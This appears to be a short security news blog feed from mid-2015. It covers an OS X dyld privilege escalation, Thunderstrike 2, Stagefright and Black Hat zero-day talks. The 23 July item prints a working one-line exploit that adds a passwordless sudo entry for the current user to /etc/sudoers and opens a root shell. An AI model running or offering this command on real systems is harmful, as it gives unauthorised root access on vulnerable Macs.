Aug 15 04
Oh no, only a couple of days after OS X a privilege escalation vulnerability in OS X 10.10 was discovered a researcher at Malwarebytes spot a new adware installer that uses DYLD_PRINT_TO_FILE exploit.
What you can do?
- wait until Apple released a security update while you get p0wned
- install SUIDGuard – A kernel extension adding mitigations to protect SUID/SGID binaries
Aug 15 03
Kovah, who discovered with his partners a lot of firmware vulnerabilities in Macs last year has now designed with Trammell Hudson, a security engineer a worm they dubbed Thunderstrike 2 that can spread between MacBooks undetected.
[The attack is] really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware
Find out more at BlackHat & DefCon or read an amazing article @wired
Jul 15 28
Full disclosure at BlackHat 2015!
‘Stagefright’ it gets the title of ‘Mother of all Android Vulnerabilities’, as it impacts 95% of all Android devices out there and do not require any interaction with the victim.
The cause of the problem appears to be a memory error in the processing of MPEG4 and 3GPP video files.
Jul 15 23
Security expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.
Jul 15 21
…a very interesting article published in wired magazine about wireless carjacking.
Jul 15 18
At Black Hat USA security conference 2015 will be presented more than 30 Zero-Day flaws.
“We have 32 different zero-day vulnerabilities that will be disclosed at the event,” Wylie said. “The zero-days come from a broad swath of topics, including mobile and SCADA [supervisory control and data acquisition] systems.”
I am very curious already.